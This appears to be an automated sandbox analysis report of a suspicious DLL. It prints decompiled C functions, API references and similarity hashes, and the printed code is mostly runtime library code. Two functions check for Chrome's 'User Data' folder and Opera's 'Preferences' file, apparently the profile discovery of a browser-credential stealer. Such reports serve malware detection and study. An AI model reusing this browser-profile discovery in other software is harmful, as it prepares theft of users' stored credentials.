                                                  0x1014b1d6
                                                  0x1014b1e3
                                                  0x1014b479
                                                  0x1014b480
                                                  0x00000000
                                                  0x1014b480
                                                  0x1014b1e9
                                                  0x1014b204
                                                  0x1014b21c
                                                  0x1014b221
                                                  0x1014b225
                                                  0x1014b23a
                                                  0x1014b23f
                                                  0x1014b242
                                                  0x1014b24a
                                                  0x1014b24c
                                                  0x1014b282
                                                  0x1014b284
                                                  0x1014b2a2
                                                  0x1014b2a7
                                                  0x1014b2aa
                                                  0x1014b2aa
                                                  0x1014b24e
                                                  0x1014b26a
                                                  0x1014b26f
                                                  0x1014b272
                                                  0x1014b272
                                                  0x1014b2b7
                                                  0x1014b30a
                                                  0x1014b324
                                                  0x1014b336
                                                  0x1014b33b
                                                  0x1014b33e
                                                  0x1014b34b
                                                  0x1014b35e
                                                  0x1014b365
                                                  0x1014b379
                                                  0x1014b38f
                                                  0x1014b3a5
                                                  0x1014b3c0
                                                  0x1014b3db
                                                  0x1014b3f6
                                                  0x1014b3fb
                                                  0x1014b40b
                                                  0x1014b40b
                                                  0x1014b365
                                                  0x1014b410
                                                  0x1014b417
                                                  0x1014b41f
                                                  0x1014b420
                                                  0x1014b425
                                                  0x1014b425
                                                  0x1014b428
                                                  0x1014b42f
                                                  0x1014b437
                                                  0x1014b438
                                                  0x1014b43d
                                                  0x1014b43d
                                                  0x1014b440
                                                  0x1014b447
                                                  0x1014b44f
                                                  0x1014b450
                                                  0x1014b455
                                                  0x1014b455
                                                  0x1014b447
                                                  0x1014b458
                                                  0x1014b462
                                                  0x1014b1fe
                                                  0x1014b1fe
                                                  0x1014b473
                                                  0x00000000
                                                  0x1014b473
                                                  0x00000000

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B23A
                                                  • _memset.LIBCMT ref: 1014B379
                                                  • _memset.LIBCMT ref: 1014B38F
                                                  • _memset.LIBCMT ref: 1014B3A5
                                                  • _strcpy_s.LIBCMT ref: 1014B3C0
                                                  • _strcpy_s.LIBCMT ref: 1014B3DB
                                                  • _strcpy_s.LIBCMT ref: 1014B3F6
                                                    • Part of subcall function 1014AEB0: _memcmp.LIBCMT ref: 1014AECE
                                                    • Part of subcall function 100252D1: __lock.LIBCMT ref: 100252EF
                                                    • Part of subcall function 100252D1: ___sbh_find_block.LIBCMT ref: 100252FA
                                                    • Part of subcall function 100252D1: ___sbh_free_block.LIBCMT ref: 10025309
                                                    • Part of subcall function 100252D1: HeapFree.KERNEL32(00000000,100235AB,1027D170,Function_000252D1,1002DFFD,00000000,1027D5F0,0000000C,1002E035,100235AB,40182005,100235AB,10025381,00000004,1027D190,0000000C), ref: 10025339
                                                    • Part of subcall function 100252D1: GetLastError.KERNEL32(?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 1002534A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _memset$_strcpy_s$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_memcmp
                                                  • String ID:
                                                  • API String ID: 1867732891-0
                                                  • Opcode ID: a8d626c00f76823934735d86975984973dd6a153f2b5ca6ed7c630006f6af6e3
                                                  • Instruction ID: 55d678435bdf5076dddb917c4b4cd6dc7b2d9186f5678cc075fa9f6bf607515f
                                                  • Opcode Fuzzy Hash: a8d626c00f76823934735d86975984973dd6a153f2b5ca6ed7c630006f6af6e3
                                                  • Instruction Fuzzy Hash: C0916BB5C102289BDB26DB60DDC6BD9B3BCFB04300F5445E9E10AAA191EB75AF84CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100052F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E100052F0(intOrPtr __ecx, signed int _a4, signed char _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				char _v124;
				char _v152;
				char _v192;
				char _v220;
				intOrPtr _v224;
				intOrPtr _t43;
				intOrPtr _t85;

				_push(0xffffffff);
				_push(0x10170a1e);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t85;
				_v224 = __ecx;
				 *(_v224 + 8) = _a4 & 0x00000017;
				_t43 = _v224;
				if(( *(_v224 + 8) &  *(_t43 + 0xc)) != 0) {
					if((_a8 & 0x000000ff) == 0) {
						if(( *(_v224 + 8) &  *(_v224 + 0xc) & 0x00000004) == 0) {
							if(( *(_v224 + 8) &  *(_v224 + 0xc) & 0x00000002) == 0) {
								E10001320( &_v220, "ios_base::eofbit set");
								_v8 = 2;
								E10005280( &_v192,  &_v220);
								E10028911( &_v192, 0x1027f3c0);
								_v8 = 0xffffffff;
								_t43 = E10001360( &_v220);
							} else {
								E10001320( &_v152, "ios_base::failbit set");
								_v8 = 1;
								E10005280( &_v124,  &_v152);
								E10028911( &_v124, 0x1027f3c0);
								_v8 = 0xffffffff;
								_t43 = E10001360( &_v152);
							}
						} else {
							E10001320( &_v84, "ios_base::badbit set");
							_v8 = 0;
							E10005280( &_v56,  &_v84);
							E10028911( &_v56, 0x1027f3c0);
							_v8 = 0xffffffff;
							_t43 = E10001360( &_v84);
						}
					} else {
						_t43 = E10028911(0, 0);
					}
				}
				 *[fs:0x0] = _v16;
				return _t43;
			}














                                                  0x100052f3
                                                  0x100052f5
                                                  0x10005300
                                                  0x10005301
                                                  0x1000530e
                                                  0x10005320
                                                  0x10005329
                                                  0x10005335
                                                  0x10005342
                                                  0x10005367
                                                  0x100053c0
                                                  0x10005415
                                                  0x1000541a
                                                  0x1000542e
                                                  0x1000543f
                                                  0x10005444
                                                  0x10005451
                                                  0x100053c2
                                                  0x100053cd
                                                  0x100053d2
                                                  0x100053e3
                                                  0x100053f1
                                                  0x100053f6
                                                  0x10005403
                                                  0x10005403
                                                  0x10005369
                                                  0x10005371
                                                  0x10005376
                                                  0x10005384
                                                  0x10005392
                                                  0x10005397
                                                  0x100053a1
                                                  0x100053a1
                                                  0x10005344
                                                  0x10005348
                                                  0x10005348
                                                  0x10005342
                                                  0x10005459
                                                  0x10005463

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 0-1866435925
                                                  • Opcode ID: c4a3a4033d4cc79ad8aed1496fe4e14b9f4e9391bfa0bfae04132b05894cf149
                                                  • Instruction ID: 194b55b84aa060c8fe605b8bd120f7d4bcca4070c16de79cddad464b04800f54
                                                  • Opcode Fuzzy Hash: c4a3a4033d4cc79ad8aed1496fe4e14b9f4e9391bfa0bfae04132b05894cf149
                                                  • Instruction Fuzzy Hash: 56414C35805258EBE714CB90CC51FDEB370EB11390F54C29AA4192B285DB316F85CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10037338, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10037338(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E100239FC( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002F207( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = L10028DE9(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t57 =  *(_t56 + 0xac);
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                  0x10037340
                                                  0x10037347
                                                  0x1003735c
                                                  0x00000000
                                                  0x1003734e
                                                  0x10037350
                                                  0x10037368
                                                  0x1003736d
                                                  0x10037370
                                                  0x10037373
                                                  0x1003739c
                                                  0x100373a1
                                                  0x100373a5
                                                  0x10037426
                                                  0x10037441
                                                  0x10037443
                                                  0x10037383
                                                  0x10037383
                                                  0x10037386
                                                  0x10037388
                                                  0x1003738b
                                                  0x1003738b
                                                  0x1003738b
                                                  0x1003738b
                                                  0x00000000
                                                  0x10037391
                                                  0x10037405
                                                  0x10037405
                                                  0x1003740a
                                                  0x10037410
                                                  0x10037413
                                                  0x10037415
                                                  0x10037418
                                                  0x10037418
                                                  0x10037418
                                                  0x10037418
                                                  0x00000000
                                                  0x1003741c
                                                  0x100373a7
                                                  0x100373aa
                                                  0x100373b0
                                                  0x100373b3
                                                  0x100373da
                                                  0x100373dd
                                                  0x100373e3
                                                  0x00000000
                                                  0x00000000
                                                  0x100373e5
                                                  0x100373e8
                                                  0x00000000
                                                  0x00000000
                                                  0x100373ea
                                                  0x100373ea
                                                  0x100373ed
                                                  0x100373f3
                                                  0x10037361
                                                  0x10037361
                                                  0x100373fc
                                                  0x00000000
                                                  0x100373fc
                                                  0x100373b5
                                                  0x100373b8
                                                  0x00000000
                                                  0x00000000
                                                  0x100373bc
                                                  0x100373cd
                                                  0x100373d3
                                                  0x100373d5
                                                  0x100373d8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x100373d8
                                                  0x10037375
                                                  0x10037378
                                                  0x1003737a
                                                  0x10037380
                                                  0x10037380
                                                  0x00000000
                                                  0x10037352
                                                  0x10037352
                                                  0x10037357
                                                  0x10037359
                                                  0x10037359
                                                  0x00000000
                                                  0x10037357
                                                  0x10037350

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10037368
                                                  • __isleadbyte_l.LIBCMT ref: 1003739C
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?), ref: 100373CD
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?), ref: 1003743B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID: F*
                                                  • API String ID: 3058430110-2578036169
                                                  • Opcode ID: 5ca73737bb46f59e5341071ca7a228a1587cbc3b8c434691c6ee7ad55b545def
                                                  • Instruction ID: 1022e888aa7a284cd680d65924dd5e65059e2054748a369e51e528b26a84b84c
                                                  • Opcode Fuzzy Hash: 5ca73737bb46f59e5341071ca7a228a1587cbc3b8c434691c6ee7ad55b545def
                                                  • Instruction Fuzzy Hash: BF319231901296EFDB22DF64CC819AD7BF5FF01252F1685A9E8688F191E330EE40EB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015470, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 62%
                                                  			E10015470(void* __eflags, signed int _a4, signed int _a8, signed short _a12) {
				_Unknown_base(*)()* _v8;
				signed short _v24;
				intOrPtr _v292;
				char _v296;
				char _v300;
				void* _t36;

				_v8 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				_v300 = 0;
				E10025A10(_t36,  &_v296, 0, 0x118);
				_v300 = 0x11c;
				if(_v8 == 0) {
					L12:
					return 0;
				}
				_push( &_v300);
				if(_v8() != 0) {
					goto L12;
				}
				if(_v296 <= (_a4 & 0x0000ffff)) {
					if(_v296 >= (_a4 & 0x0000ffff)) {
						if(_v292 <= (_a8 & 0x0000ffff)) {
							if(_v292 >= (_a8 & 0x0000ffff)) {
								if((_v24 & 0x0000ffff) < (_a12 & 0x0000ffff)) {
									goto L12;
								}
								return 1;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 1;
			}









                                                  0x10015490
                                                  0x10015493
                                                  0x100154ab
                                                  0x100154b3
                                                  0x100154c1
                                                  0x10015525
                                                  0x00000000
                                                  0x10015525
                                                  0x100154c9
                                                  0x100154cf
                                                  0x00000000
                                                  0x00000000
                                                  0x100154db
                                                  0x100154ed
                                                  0x100154fd
                                                  0x1001550f
                                                  0x1001551f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x10015521
                                                  0x00000000
                                                  0x10015511
                                                  0x00000000
                                                  0x100154ff
                                                  0x00000000
                                                  0x100154ef
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion), ref: 10015483
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001548A
                                                  • _memset.LIBCMT ref: 100154AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc_memset
                                                  • String ID: RtlGetVersion$ntdll.dll
                                                  • API String ID: 3368017834-1489217083
                                                  • Opcode ID: f0411b4e5ae05a0873e0d5fc163622cbe6d5c2eea76f9532caa9f6777c5f66da
                                                  • Instruction ID: ef82c88800f85540164473f12be096c334d6701110700ae7cb67f5c65c915d1f
                                                  • Opcode Fuzzy Hash: f0411b4e5ae05a0873e0d5fc163622cbe6d5c2eea76f9532caa9f6777c5f66da
                                                  • Instruction Fuzzy Hash: 0C119E70804229E6CF60CF5098157ED73F6EB0530BF5491A5E949AE181E73ACAD0EF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1009F4E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E1009F4E0(void* __edi, void* __eflags) {
				char _v267;
				char _v268;
				char _v272;

				_v272 = 0;
				_v268 = 0;
				E10025A10(__edi,  &_v267, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1c, 0);
				E10025E1D( &_v268,  &_v268, 0x104, "\\Google\\Chrome\\User Data");
				if(PathFileExistsA( &_v268) != 0) {
					_v272 = 1;
				}
				return _v272;
			}






                                                  0x1009f4e9
                                                  0x1009f4f3
                                                  0x1009f508
                                                  0x1009f51d
                                                  0x1009f534
                                                  0x1009f54b
                                                  0x1009f54d
                                                  0x1009f54d
                                                  0x1009f560

                                                  APIs
                                                  • _memset.LIBCMT ref: 1009F508
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1009F51D
                                                  • _strcat_s.LIBCMT ref: 1009F534
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1009F543
                                                  Strings
                                                  • \Google\Chrome\User Data, xrefs: 1009F523
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$ExistsFileFolderSpecial_memset_strcat_s
                                                  • String ID: \Google\Chrome\User Data
                                                  • API String ID: 262460964-4004360220
                                                  • Opcode ID: 225e417c17268c1e68cfcba1108931edcc714363e298203aab8375d69dcb8d3e
                                                  • Instruction ID: 091138065cd962437759b41a3236aa7b67415309ae8fd355c06ba1a3221470d0
                                                  • Opcode Fuzzy Hash: 225e417c17268c1e68cfcba1108931edcc714363e298203aab8375d69dcb8d3e
                                                  • Instruction Fuzzy Hash: 7CF0627594421857EB50DB60DC86FD977789B20700F4042C4EA88A61C0EBF9AAC48F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1009E660, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E1009E660(void* __edi, void* __eflags) {
				char _v267;
				char _v268;
				char _v272;

				_v272 = 0;
				_v268 = 0;
				E10025A10(__edi,  &_v267, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
				E10025E1D( &_v268,  &_v268, 0x104, "\\Opera Software\\Opera Stable\\Preferences");
				if(PathFileExistsA( &_v268) != 0) {
					_v272 = 1;
				}
				return _v272;
			}






                                                  0x1009e669
                                                  0x1009e673
                                                  0x1009e688
                                                  0x1009e69d
                                                  0x1009e6b4
                                                  0x1009e6cb
                                                  0x1009e6cd
                                                  0x1009e6cd
                                                  0x1009e6e0

                                                  APIs
                                                  • _memset.LIBCMT ref: 1009E688
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1009E69D
                                                  • _strcat_s.LIBCMT ref: 1009E6B4
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1009E6C3
                                                  Strings
                                                  • \Opera Software\Opera Stable\Preferences, xrefs: 1009E6A3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$ExistsFileFolderSpecial_memset_strcat_s
                                                  • String ID: \Opera Software\Opera Stable\Preferences
                                                  • API String ID: 262460964-1945003741
                                                  • Opcode ID: c02b13473c05068dc98986d721c9ddc00705f43d7913f288a83e67806d850ce6
                                                  • Instruction ID: 57f12993f32fb78112b67dc2dbe288c0ace8254347ed89c983fec87c192620c5
                                                  • Opcode Fuzzy Hash: c02b13473c05068dc98986d721c9ddc00705f43d7913f288a83e67806d850ce6
                                                  • Instruction Fuzzy Hash: 4BF09675A4431867EB60DB60DC87FD97778AB20704F4041D4FA88A61C0EBF56AD48FD2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10009DB0, Relevance: 7.9, APIs: 5, Instructions: 389memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E10009DB0(intOrPtr __ecx, char _a4, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v92;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v204;
				char _v216;
				char _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				char _v272;
				char _v284;
				char _v296;
				char _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				char _v328;
				char _v340;
				char _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				char _v372;
				intOrPtr _v376;
				char _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr* _t184;
				void* _t199;
				intOrPtr _t205;
				intOrPtr* _t209;
				intOrPtr _t219;
				intOrPtr* _t223;
				intOrPtr* _t245;
				intOrPtr _t359;
				intOrPtr _t368;
				intOrPtr _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t385;
				intOrPtr _t387;
				intOrPtr _t390;
				intOrPtr _t393;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t397;
				intOrPtr _t400;

				_push(0xffffffff);
				_push(0x101708f3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t381;
				_push(__ecx);
				_t382 = _t381 - 0x184;
				_v20 = _t382;
				_v400 = __ecx;
				E1000B7D0( &_v36);
				_v48 = E1000B850( &_a4, E10009A40(_v400,  &_v148));
				_v44 =  *((intOrPtr*)(_v400 + 0x10)) - _v48;
				_v24 =  *((intOrPtr*)(_v400 + 0x10));
				if(_v48 >= _v44) {
					_v8 = 3;
					__eflags = _v44 - _a16;
					if(_v44 >= _a16) {
						_v40 = 0;
						while(1) {
							__eflags = _v40 - _a16;
							if(_v40 >= _a16) {
								break;
							}
							E10006DB0(_v400, E1000B870(E10009A40(_v400,  &_v328), _v48 + _v44 - _a16 + _v40));
							_t205 = _v40 + 1;
							__eflags = _t205;
							_v40 = _t205;
						}
						_t184 = E1000B000(E10009A40(_v400,  &_v340),  &_v352, _v48);
						_v36 =  *_t184;
						_v32 =  *((intOrPtr*)(_t184 + 4));
						_v28 =  *((intOrPtr*)(_t184 + 8));
						_v408 = E1000B1F0( &_v136, _a20);
						_v8 = 4;
						_t383 = _t382 - 0xc;
						_v356 = _t383;
						E1000B000( &_v36, _t383, _v44);
						_t384 = _t383 - 0xc;
						_v360 = _t384;
						E1000B810(E1000B000( &_v36,  &_v372, _v44), _t384, _a16);
						_t385 = _t384 - 0xc;
						_v376 = _t385;
						E1000B240(_t385,  &_v36);
						_push( &_v388);
						E1000C3A0(_t385);
						_push( &_v136);
						_t387 = _t385 + 0x28 - 0xc;
						_v392 = _t387;
						E1000B000( &_v36, _t387, _a16);
						_v396 = _t387 - 0xc;
						E1000B240(_t387 - 0xc,  &_v36);
						E1000C4C0(__eflags);
						_v8 = 3;
						_t199 = E10005790( &_v136);
					} else {
						_v40 = _a16 - _v44;
						while(1) {
							__eflags = _v40;
							if(_v40 <= 0) {
								break;
							}
							E10006DB0(_v400, _a20);
							_t219 = _v40 - 1;
							__eflags = _t219;
							_v40 = _t219;
						}
						_v40 = 0;
						while(1) {
							__eflags = _v40 - _v44;
							if(__eflags >= 0) {
								break;
							}
							E10006DB0(_v400, E1000B870(E10009A40(_v400,  &_v284), _v48 + _v40));
							_t359 = _v40 + 1;
							__eflags = _t359;
							_v40 = _t359;
						}
						_t209 = E1000B000(E10009A40(_v400,  &_v296),  &_v308, _v48);
						_v36 =  *_t209;
						_v32 =  *((intOrPtr*)(_t209 + 4));
						_v28 =  *((intOrPtr*)(_t209 + 8));
						_push(_a20);
						_t390 = _t382 - 0xc;
						_v312 = _t390;
						E1000B000( &_v36, _t390, _v44);
						_v316 = _t390 - 0xc;
						E1000B240(_t390 - 0xc,  &_v36);
						_t199 = E1000C4C0(__eflags);
					}
					_v8 = 0xffffffff;
				} else {
					_v8 = 0;
					if(_v48 >= _a16) {
						_v40 = _a16;
						while(1) {
							__eflags = _v40;
							if(_v40 <= 0) {
								break;
							}
							E1000B500(_v400, E1000B870(E10009A40(_v400,  &_v204), _a16 - 1));
							_t368 = _v40 - 1;
							__eflags = _t368;
							_v40 = _t368;
						}
						_t223 = E1000B000(E10009A40(_v400,  &_v216),  &_v228, _a16);
						_v36 =  *_t223;
						_v32 =  *((intOrPtr*)(_t223 + 4));
						_v28 =  *((intOrPtr*)(_t223 + 8));
						_v404 = E1000B1F0( &_v92, _a20);
						_v8 = 1;
						_t393 = _t382 - 0xc;
						_v232 = _t393;
						E1000B240(_t393,  &_v36);
						_t394 = _t393 - 0xc;
						_v236 = _t394;
						E1000B000( &_v36, _t394, _v48);
						_t395 = _t394 - 0xc;
						_v240 = _t395;
						E1000B000( &_v36, _t395, _a16);
						_push( &_v252);
						E1000C430( &_v252);
						_push( &_v92);
						_t397 = _t395 + 0x28 - 0xc;
						_v256 = _t397;
						E1000B000( &_v36, _t397, _v48);
						_v260 = _t397 - 0xc;
						E1000B000(E10009A40(_v400,  &_v272), _t397 - 0xc, _v48);
						E1000C4C0(__eflags);
						_v8 = 0;
						_t199 = E10005790( &_v92);
					} else {
						_v40 = _a16 - _v48;
						while(_v40 > 0) {
							E1000B500(_v400, _a20);
							_v40 = _v40 - 1;
						}
						_v40 = _v48;
						while(1) {
							__eflags = _v40;
							if(__eflags <= 0) {
								break;
							}
							E1000B500(_v400, E1000B870(E10009A40(_v400,  &_v160), _a16 - 1));
							_t374 = _v40 - 1;
							__eflags = _t374;
							_v40 = _t374;
						}
						_t245 = E1000B000(E10009A40(_v400,  &_v172),  &_v184, _a16);
						_v36 =  *_t245;
						_v32 =  *((intOrPtr*)(_t245 + 4));
						_v28 =  *((intOrPtr*)(_t245 + 8));
						_push(_a20);
						_t400 = _t382 - 0xc;
						_v188 = _t400;
						E1000B000( &_v36, _t400, _v48);
